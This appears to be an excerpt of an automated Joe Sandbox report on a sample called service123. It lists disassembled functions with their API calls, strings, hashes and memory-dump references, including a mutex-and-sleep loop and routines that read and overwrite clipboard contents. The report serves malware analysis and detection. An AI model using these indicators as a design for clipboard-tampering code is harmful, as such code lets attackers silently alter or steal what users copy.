Associated: 00000005.00000002.2673608285.00000000007BA000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000005.00000002.2673622881.00000000007BE000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000005.00000002.2673637354.00000000007C1000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_7b0000_service123.jbxd

Similarity

API ID: malloc$ExceptionFilterInfoSleepStartupUnhandled__p__acmdlnmemcpystrlen
String ID:
API String ID: 1672962128-0
Opcode ID: a8d0f44227cea97b41dbb640d1f714d643214cd16c46ef2b10aa898c76cfb803
Instruction ID: 13aceb49b9355272aa4f28d7ac0c5b8c10c811e166080bdfcaaab35fab7d7804
Opcode Fuzzy Hash: a8d0f44227cea97b41dbb640d1f714d643214cd16c46ef2b10aa898c76cfb803
Instruction Fuzzy Hash: DC514E75A04305CFDB20EF68D8A4B9AB7F0FB48344F90862CE9449B310E738AC06CB95

Function 6CA39B70 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 32
sleepsynchronizationclipboardCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

OpenMutexA.KERNEL32 ref: 6CA39B99
CreateMutexA.KERNELBASE ref: 6CA39BE3
Sleep.KERNELBASE ref: 6CA39BFF
GetClipboardSequenceNumber.USER32 ref: 6CA39C08

Strings

hRspMaLdjdjKRSFxtNUo, xrefs: 6CA39B82, 6CA39BCC

Memory Dump Source

Source File: 00000005.00000002.2673773718.000000006CA21000.00000020.00000001.01000000.00000006.sdmp, Offset: 6CA20000, based on PE: true

Associated: 00000005.00000002.2673753776.000000006CA20000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2673885280.000000006CAFD000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2673901345.000000006CAFF000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2673934714.000000006CB48000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2673958255.000000006CB49000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2673972662.000000006CB4C000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_6ca20000_service123.jbxd

Similarity

API ID: Mutex$ClipboardCreateNumberOpenSequenceSleep
String ID: hRspMaLdjdjKRSFxtNUo
API String ID: 3689039344-2151053459
Opcode ID: 0c24284c1729d4a7d7d05f9e0a4b5185c9d9132adfe5f7f99f34aa98f296b9b5
Instruction ID: 9041e90f91d2296ecd8f7d61686b9aca149164952a21b7961d490dfdee868251
Opcode Fuzzy Hash: 0c24284c1729d4a7d7d05f9e0a4b5185c9d9132adfe5f7f99f34aa98f296b9b5
Instruction Fuzzy Hash: B501D2719083069FCB00EF78C64975BBFF8BB41349F01881CE89993644EB74A489CF92

Function 007B1296 Relevance: 5.1, APIs: 4, Instructions: 80
stringCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

malloc.MSVCRT ref: 007B12EB
strlen.MSVCRT ref: 007B1323
malloc.MSVCRT ref: 007B132E
memcpy.MSVCRT ref: 007B1344

Memory Dump Source

Source File: 00000005.00000002.2673593055.00000000007B1000.00000020.00000001.01000000.00000005.sdmp, Offset: 007B0000, based on PE: true

Associated: 00000005.00000002.2673579668.00000000007B0000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000005.00000002.2673608285.00000000007BA000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000005.00000002.2673622881.00000000007BE000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000005.00000002.2673637354.00000000007C1000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_7b0000_service123.jbxd

Similarity

API ID: malloc$memcpystrlen
String ID:
API String ID: 3553820921-0
Opcode ID: 4af1fed4f3671378d378fef72a3a355dff0883fe1c4c6d46f1a4423567bb233a
Instruction ID: 03dc655f2d88993312c1104a8ea59ee7fdab20a3d1f53ae8de25011b93f1d851
Opcode Fuzzy Hash: 4af1fed4f3671378d378fef72a3a355dff0883fe1c4c6d46f1a4423567bb233a
Instruction Fuzzy Hash: DF312775A04315CFCB20EF64D894BA9BBF1FB48300F55862DD94897311E739A906CF85

Function 007B13BB Relevance: 5.1, APIs: 4, Instructions: 66
stringCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

malloc.MSVCRT ref: 007B12EB
strlen.MSVCRT ref: 007B1323
malloc.MSVCRT ref: 007B132E
memcpy.MSVCRT ref: 007B1344

Memory Dump Source

Source File: 00000005.00000002.2673593055.00000000007B1000.00000020.00000001.01000000.00000005.sdmp, Offset: 007B0000, based on PE: true

Associated: 00000005.00000002.2673579668.00000000007B0000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000005.00000002.2673608285.00000000007BA000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000005.00000002.2673622881.00000000007BE000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000005.00000002.2673637354.00000000007C1000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_7b0000_service123.jbxd

Similarity

API ID: malloc$memcpystrlen
String ID:
API String ID: 3553820921-0
Opcode ID: a30d3044b4cb166b012ea5359291a4f582bd19c2bf704f63bae4d4e06568b794
Instruction ID: 750c909389cc400e954ebd54f23b6757323f2df6517b22c28dbea74585fb8bc5
Opcode Fuzzy Hash: a30d3044b4cb166b012ea5359291a4f582bd19c2bf704f63bae4d4e06568b794
Instruction Fuzzy Hash: 4521D5B5905715CFCB24EF64D894BA9B7F1BB48300F51862DD94497310E738A906CF85

Function 6CA3B3F0 Relevance: 1.4, APIs: 1, Instructions: 144
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Memory Dump Source

Source File: 00000005.00000002.2673773718.000000006CA21000.00000020.00000001.01000000.00000006.sdmp, Offset: 6CA20000, based on PE: true

Associated: 00000005.00000002.2673753776.000000006CA20000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2673885280.000000006CAFD000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2673901345.000000006CAFF000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2673934714.000000006CB48000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2673958255.000000006CB49000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2673972662.000000006CB4C000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_6ca20000_service123.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 98b0c4b83d2275c18e36b19abcb5aaba571284c9aec468910519d841d7840185
Instruction ID: 3cf5f2a68176cb417e2e2efa75238f270d9d6da0a48abd3f292fcecad05a75de
Opcode Fuzzy Hash: 98b0c4b83d2275c18e36b19abcb5aaba571284c9aec468910519d841d7840185
Instruction Fuzzy Hash: B05170B5A057128FD704DF1DE19051ABBF1FF85308B18965DE4A9CBB10E330E485CBA2

Function 6CA3B560 Relevance: 1.3, APIs: 1, Instructions: 95
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Memory Dump Source

Source File: 00000005.00000002.2673773718.000000006CA21000.00000020.00000001.01000000.00000006.sdmp, Offset: 6CA20000, based on PE: true

Associated: 00000005.00000002.2673753776.000000006CA20000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2673885280.000000006CAFD000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2673901345.000000006CAFF000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2673934714.000000006CB48000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2673958255.000000006CB49000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2673972662.000000006CB4C000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_6ca20000_service123.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 33d1dda5bb200c3a87405502e96ba8e9326d87a1156b3926456faf3e4b8db5cf
Instruction ID: c7c771bab4b4264d380cebac451d60a4425af75284f3ba50ce365f8729e60d64
Opcode Fuzzy Hash: 33d1dda5bb200c3a87405502e96ba8e9326d87a1156b3926456faf3e4b8db5cf
Instruction Fuzzy Hash: D331F3B1B057118FEB059F28E5D024577B6BF46308B4C836CD969CBB45E730D48ACB62

Non-executed Functions

Function 6CA2CD00 Relevance: 33.4, APIs: 22, Instructions: 445stringCOMMON

Download Yara Rule

APIs

strlen.MSVCRT ref: 6CA2CD7D

Memory Dump Source

Source File: 00000005.00000002.2673773718.000000006CA21000.00000020.00000001.01000000.00000006.sdmp, Offset: 6CA20000, based on PE: true

Associated: 00000005.00000002.2673753776.000000006CA20000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2673885280.000000006CAFD000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2673901345.000000006CAFF000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2673934714.000000006CB48000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2673958255.000000006CB49000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2673972662.000000006CB4C000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_6ca20000_service123.jbxd

Similarity

API ID: strlen
String ID:
API String ID: 39653677-0
Opcode ID: 10df4be027811ee821c501b8a762923e8850003946b6cd35044eedcf135e30f4
Instruction ID: f80dee32b81fbbc7be717287a2e99150bf3960d6954680101e1585f9020ddbfc
Opcode Fuzzy Hash: 10df4be027811ee821c501b8a762923e8850003946b6cd35044eedcf135e30f4
Instruction Fuzzy Hash: 960208719087618FE710CF29C044395FBE2AF4631CF1D866ED8A957B92C37AE589CB81

Function 6CA30FC0 Relevance: 22.6, APIs: 8, Strings: 4, Instructions: 1647stringCOMMON

Download Yara Rule

APIs

localeconv.MSVCRT ref: 6CA30FCA
strlen.MSVCRT ref: 6CA30FD4

Strings

, xrefs: 6CA3240F
!, xrefs: 6CA32C08
inity, xrefs: 6CA31E21
5, xrefs: 6CA314D2

Memory Dump Source

Source File: 00000005.00000002.2673773718.000000006CA21000.00000020.00000001.01000000.00000006.sdmp, Offset: 6CA20000, based on PE: true

Associated: 00000005.00000002.2673753776.000000006CA20000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2673885280.000000006CAFD000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2673901345.000000006CAFF000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2673934714.000000006CB48000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2673958255.000000006CB49000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2673972662.000000006CB4C000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_6ca20000_service123.jbxd

Similarity

API ID: localeconvstrlen
String ID: $!$5$inity
API String ID: 186660782-1328200385
Opcode ID: adb86d02055f4511d860cb10ff0474b1afba870c2e649ed3f4bb5c73272b9124
Instruction ID: cbcb8a0f56f48ad325043c2fcadc4712b368fdc3117a370ddaa630b85a0b98b3
Opcode Fuzzy Hash: adb86d02055f4511d860cb10ff0474b1afba870c2e649ed3f4bb5c73272b9124
Instruction Fuzzy Hash: 1AF26871A083918FD320CF68C59479ABBE0BF89308F159A1EE9D9D7751D774D888CB82

Function 6CAA84D0 Relevance: 17.7, Strings: 14, Instructions: 166COMMON

Download Yara Rule

Strings

Genu, xrefs: 6CAA866E
Auth, xrefs: 6CAA8676
random_device::random_device(const std::string&): unsupported token, xrefs: 6CAA86D2
random_device::random_device(const std::string&): device not available, xrefs: 6CAA8598
hardware, xrefs: 6CAA86A0
Genu, xrefs: 6CAA85DF
rdrand, xrefs: 6CAA85A8
default, xrefs: 6CAA84EF
Auth, xrefs: 6CAA85E7
Genu, xrefs: 6CAA8557
rdseed, xrefs: 6CAA8518
Auth, xrefs: 6CAA854F
rdrnd, xrefs: 6CAA8618
rand_s, xrefs: 6CAA86B7

Memory Dump Source

Source File: 00000005.00000002.2673773718.000000006CA21000.00000020.00000001.01000000.00000006.sdmp, Offset: 6CA20000, based on PE: true

Associated: 00000005.00000002.2673753776.000000006CA20000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2673885280.000000006CAFD000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2673901345.000000006CAFF000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2673934714.000000006CB48000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2673958255.000000006CB49000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2673972662.000000006CB4C000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_6ca20000_service123.jbxd

Similarity

API ID: memcmpstrlen
String ID: Auth$Auth$Auth$Genu$Genu$Genu$default$hardware$rand_s$random_device::random_device(const std::string&): device not available$random_device::random_device(const std::string&): unsupported token$rdrand$rdrnd$rdseed
API String ID: 3108337309-1359127009
Opcode ID: d3a57ff2c98df42446708eeae1f12b2cd5bffa0c2d84ec167f33f3f8abb8c8bd
Instruction ID: 5a39478b7ad3263c5e51042829980bf2910629707abdb575da9921fc8395ba20
Opcode Fuzzy Hash: d3a57ff2c98df42446708eeae1f12b2cd5bffa0c2d84ec167f33f3f8abb8c8bd
Instruction Fuzzy Hash: 3941FCF16193C24BE3046A78D58235ABAA57B4031CF248A3EDC82D7F51E735D5D6C352

Function 6CA2EE50 Relevance: 12.5, APIs: 8, Instructions: 494COMMON

Download Yara Rule

APIs

malloc.MSVCRT ref: 6CA2F18B
malloc.MSVCRT ref: 6CA2F1A8

Memory Dump Source

Source File: 00000005.00000002.2673773718.000000006CA21000.00000020.00000001.01000000.00000006.sdmp, Offset: 6CA20000, based on PE: true

Associated: 00000005.00000002.2673753776.000000006CA20000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2673885280.000000006CAFD000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2673901345.000000006CAFF000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2673934714.000000006CB48000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2673958255.000000006CB49000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2673972662.000000006CB4C000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_6ca20000_service123.jbxd

Similarity

API ID: malloc
String ID:
API String ID: 2803490479-0
Opcode ID: 7723f5c6b8774033fbe649786eb8394f43f58893d7b7640006dd5e4c4c13bf8e
Instruction ID: fbf8d48ac182a5a77f028beadfc800bb0a1aec79f889def67b2ca0fd09ec586a
Opcode Fuzzy Hash: 7723f5c6b8774033fbe649786eb8394f43f58893d7b7640006dd5e4c4c13bf8e
Instruction Fuzzy Hash: BD1284716087258FC714CF29C58061AF7E1BF88718F5D8A2DE89997B40D738EC89CB92

Function 6CA4E6E0 Relevance: 12.2, APIs: 6, Strings: 2, Instructions: 219stringCOMMON

Download Yara Rule

APIs

strlen.MSVCRT ref: 6CA4E70A
strlen.MSVCRT ref: 6CA4E77A

Strings

basic_string: construction from null is not valid, xrefs: 6CA4E742, 6CA4E7B2, 6CA4E822
basic_string: construction from null is not valid, xrefs: 6CA4E86F, 6CA4E8C0, 6CA4E910

Memory Dump Source

Source File: 00000005.00000002.2673773718.000000006CA21000.00000020.00000001.01000000.00000006.sdmp, Offset: 6CA20000, based on PE: true

Associated: 00000005.00000002.2673753776.000000006CA20000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2673885280.000000006CAFD000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2673901345.000000006CAFF000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2673934714.000000006CB48000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2673958255.000000006CB49000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2673972662.000000006CB4C000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_6ca20000_service123.jbxd

Similarity

API ID: strlen
String ID: basic_string: construction from null is not valid$basic_string: construction from null is not valid
API String ID: 39653677-1250104765
Opcode ID: 2df78cfba5558b0c97ed1eb8419d1b25dfe22c1c095cc232acb49f0ee8b83147
Instruction ID: 5b9ebb481a94d426afddd4f90ca47a2f5513bf958078a1c4470043b5eb7f77e6
Opcode Fuzzy Hash: 2df78cfba5558b0c97ed1eb8419d1b25dfe22c1c095cc232acb49f0ee8b83147
Instruction Fuzzy Hash: 4D619FF1A056148FCB00FF2CD58489AFBE4BF45218F46896DE8849B711E331E889CBD2

Function 6CA39D11 Relevance: 12.0, APIs: 8, Instructions: 46clipboardmemorystringCOMMON

Download Yara Rule

APIs

Part of subcall function 6CAC39D0: strlen.MSVCRT ref: 6CAC39DE

OpenClipboard.USER32 ref: 6CA39D31
GlobalAlloc.KERNEL32 ref: 6CA39D55
GlobalLock.KERNEL32 ref: 6CA39D72
strcpy.MSVCRT ref: 6CA39D82
GlobalUnlock.KERNEL32 ref: 6CA39D8A
EmptyClipboard.USER32 ref: 6CA39D93
SetClipboardData.USER32 ref: 6CA39DA4
CloseClipboard.USER32 ref: 6CA39DAD

Memory Dump Source

Source File: 00000005.00000002.2673773718.000000006CA21000.00000020.00000001.01000000.00000006.sdmp, Offset: 6CA20000, based on PE: true

Associated: 00000005.00000002.2673753776.000000006CA20000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2673885280.000000006CAFD000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2673901345.000000006CAFF000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2673934714.000000006CB48000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2673958255.000000006CB49000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2673972662.000000006CB4C000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_6ca20000_service123.jbxd

Similarity

API ID: Clipboard$Global$AllocCloseDataEmptyLockOpenUnlockstrcpystrlen
String ID:
API String ID: 3344633682-0
Opcode ID: 05c87d3ef971a0c5c6e6a174525781afe980162a46af881456ff4015eb22426d
Instruction ID: c39f0c4cb697080081d314d8c8908ab94e61a56745997a5e039aeea650b47c1c
Opcode Fuzzy Hash: 05c87d3ef971a0c5c6e6a174525781afe980162a46af881456ff4015eb22426d
Instruction Fuzzy Hash: 5711B9B19096108FDB00BF78D7992AEBAF4BF45309F45892DE48A87644EF34949CCB53

Function 6CA40860 Relevance: 10.7, APIs: 5, Strings: 2, Instructions: 212stringCOMMON

Download Yara Rule

APIs

strlen.MSVCRT ref: 6CA40886
memcmp.MSVCRT ref: 6CA408A9
memcmp.MSVCRT ref: 6CA4091F
memcmp.MSVCRT ref: 6CA40991

Part of subcall function 6CAEADB0: strlen.MSVCRT ref: 6CAEADBE

memcmp.MSVCRT ref: 6CA40A25

Strings

basic_string::compare, xrefs: 6CA408C8, 6CA4093C, 6CA409AF, 6CA40A44, 6CA40A60
%s: __pos (which is %zu) > this->size() (which is %zu), xrefs: 6CA408D0, 6CA40944, 6CA409B7, 6CA40A4C, 6CA40A68

Memory Dump Source

Source File: 00000005.00000002.2673773718.000000006CA21000.00000020.00000001.01000000.00000006.sdmp, Offset: 6CA20000, based on PE: true

Associated: 00000005.00000002.2673753776.000000006CA20000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2673885280.000000006CAFD000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2673901345.000000006CAFF000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2673934714.000000006CB48000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2673958255.000000006CB49000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2673972662.000000006CB4C000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_6ca20000_service123.jbxd

Similarity

API ID: memcmp$strlen
String ID: %s: __pos (which is %zu) > this->size() (which is %zu)$basic_string::compare
API String ID: 3738950036-1697194757
Opcode ID: 89d5687a2281e47ecee9c83d51cbf39086fa36b4a49443dc5de9d638bbd6a3ea
Instruction ID: 0371368d1ece137e607929019744365600d705e2ea6ce3863266caa6471536d6
Opcode Fuzzy Hash: 89d5687a2281e47ecee9c83d51cbf39086fa36b4a49443dc5de9d638bbd6a3ea
Instruction Fuzzy Hash: DD614472A093149FC300AF6EC9D045AFBE5AF98788F55892DE8C8C7720D631D885DB92

Function 6CA370C0 Relevance: 9.6, APIs: 6, Instructions: 649COMMON

Download Yara Rule

APIs

localeconv.MSVCRT ref: 6CA370C7
memset.MSVCRT ref: 6CA37217

Memory Dump Source

Source File: 00000005.00000002.2673773718.000000006CA21000.00000020.00000001.01000000.00000006.sdmp, Offset: 6CA20000, based on PE: true

Associated: 00000005.00000002.2673753776.000000006CA20000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2673885280.000000006CAFD000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2673901345.000000006CAFF000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2673934714.000000006CB48000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2673958255.000000006CB49000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2673972662.000000006CB4C000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_6ca20000_service123.jbxd

Similarity

API ID: localeconvmemset
String ID:
API String ID: 2367598729-0
Opcode ID: 2b309a0f882bd9eac0289d164d1d8ea42e767e878e0f29fdb26f1091fb4ae640
Instruction ID: 7d7195e8d959a2b8c8b4a38714426d6c98a54dc1a13d43e43446b890a17b90d8
Opcode Fuzzy Hash: 2b309a0f882bd9eac0289d164d1d8ea42e767e878e0f29fdb26f1091fb4ae640
Instruction Fuzzy Hash: C942F371609325CFD700CF68C6A075ABBE2BF85308F18991DE898CBB41D775D989CB92

Function 6CA35880 Relevance: 9.0, APIs: 1, Strings: 4, Instructions: 1506COMMON

Download Yara Rule

Strings

, xrefs: 6CA37074
Infinity, xrefs: 6CA35BE0
, xrefs: 6CA36D95
NaN, xrefs: 6CA35B5F

Memory Dump Source

Source File: 00000005.00000002.2673773718.000000006CA21000.00000020.00000001.01000000.00000006.sdmp, Offset: 6CA20000, based on PE: true

Associated: 00000005.00000002.2673753776.000000006CA20000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2673885280.000000006CAFD000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2673901345.000000006CAFF000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2673934714.000000006CB48000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2673958255.000000006CB49000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2673972662.000000006CB4C000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_6ca20000_service123.jbxd

Similarity

API ID:
String ID: $ $Infinity$NaN
API String ID: 0-3274152445
Opcode ID: 7604c1ab612f620fbd9b9f0b8df1d1b586d176b87e81e19e5430b7ed7188b45f
Instruction ID: c5d7147ea6a58bf88f59f945891238072cf276ebd3966882594b6c4b52ab3f27
Opcode Fuzzy Hash: 7604c1ab612f620fbd9b9f0b8df1d1b586d176b87e81e19e5430b7ed7188b45f
Instruction Fuzzy Hash: 39E231B1A093618FD310CF69C19474ABBF0BF89748F14991EE898D7751E775E8888F82

Function 6CA39E27 Relevance: 6.0, APIs: 4, Instructions: 38clipboardCOMMON

Download Yara Rule

APIs

GetClipboardData.USER32 ref: 6CA39E37
GlobalLock.KERNEL32 ref: 6CA39E49
GlobalUnlock.KERNEL32 ref: 6CA39E6A
CloseClipboard.USER32 ref: 6CA39E73
CloseClipboard.USER32 ref: 6CA39E98

Memory Dump Source

Source File: 00000005.00000002.2673773718.000000006CA21000.00000020.00000001.01000000.00000006.sdmp, Offset: 6CA20000, based on PE: true

Associated: 00000005.00000002.2673753776.000000006CA20000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2673885280.000000006CAFD000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2673901345.000000006CAFF000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2673934714.000000006CB48000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2673958255.000000006CB49000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2673972662.000000006CB4C000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_6ca20000_service123.jbxd

Similarity

API ID: Clipboard$CloseGlobal$DataLockUnlock
String ID:
API String ID: 3186146249-0
Opcode ID: a673852a76120ab1a04d41d8518743f55a46e0e5345022d85fae2661d9e8b9d0
Instruction ID: 1bf039b751442a04e09e5c1fa7d4458b1e16d47f7d1300b12a42df20652dda13
Opcode Fuzzy Hash: a673852a76120ab1a04d41d8518743f55a46e0e5345022d85fae2661d9e8b9d0
Instruction Fuzzy Hash: BCF06DB2B092018FEB007F7896481AEBBF4BB45208F044A3CD88697244DF34D48CCB93

Function 007B51B0 Relevance: 6.0, APIs: 1, Strings: 2, Instructions: 1506COMMON

Download Yara Rule

Strings

, xrefs: 007B69A4
, xrefs: 007B66C5

Memory Dump Source

Source File: 00000005.00000002.2673593055.00000000007B1000.00000020.00000001.01000000.00000005.sdmp, Offset: 007B0000, based on PE: true

Associated: 00000005.00000002.2673579668.00000000007B0000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000005.00000002.2673608285.00000000007BA000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000005.00000002.2673622881.00000000007BE000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000005.00000002.2673637354.00000000007C1000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_7b0000_service123.jbxd

Similarity

API ID:
String ID: $
API String ID: 0-227171996
Opcode ID: f149e8701b3070a80b85492c752eb0bb1b5dbf602ecac3199af340cdf953e6da
Instruction ID: c3d19b3333d0b0a2933e55d91eb60dce19365520a7d3e6f19250206f0673cc41
Opcode Fuzzy Hash: f149e8701b3070a80b85492c752eb0bb1b5dbf602ecac3199af340cdf953e6da
Instruction Fuzzy Hash: 1DE22FB1A08781CFD720DF29C18479ABBE1BF88754F14891DE98997361E779E8448F82

Function 007B3E20 Relevance: 5.4, Strings: 4, Instructions: 351COMMON

Download Yara Rule

Strings

., xrefs: 007B4114
gfff, xrefs: 007B3F43
gfff, xrefs: 007B3F2C
@, xrefs: 007B3FD9

Memory Dump Source

Source File: 00000005.00000002.2673593055.00000000007B1000.00000020.00000001.01000000.00000005.sdmp, Offset: 007B0000, based on PE: true

Associated: 00000005.00000002.2673579668.00000000007B0000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000005.00000002.2673608285.00000000007BA000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000005.00000002.2673622881.00000000007BE000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000005.00000002.2673637354.00000000007C1000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_7b0000_service123.jbxd

Similarity

API ID:
String ID: .$@$gfff$gfff
API String ID: 0-2633265772
Opcode ID: 8459d8207e057e620cf1d9af03855443049108a225ce8fe639410900789573df
Instruction ID: 12031b8e46944bacd25cfbc4216503b7210764b2dfa22e8e30c60b0f6a9fa9eb
Opcode Fuzzy Hash: 8459d8207e057e620cf1d9af03855443049108a225ce8fe639410900789573df
Instruction Fuzzy Hash: F3D1D771A083098BDB14DF28C88439BBBE1BFD4344F18C92DE9599B346D778DD898792

Function 6CA344F0 Relevance: 5.4, Strings: 4, Instructions: 351COMMON

Download Yara Rule

Strings

gfff, xrefs: 6CA345FC
., xrefs: 6CA347E4
gfff, xrefs: 6CA34613
@, xrefs: 6CA346A9

Memory Dump Source

Source File: 00000005.00000002.2673773718.000000006CA21000.00000020.00000001.01000000.00000006.sdmp, Offset: 6CA20000, based on PE: true

Associated: 00000005.00000002.2673753776.000000006CA20000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2673885280.000000006CAFD000.00000004.00000001.01000000.00000006.sdmpDownload File
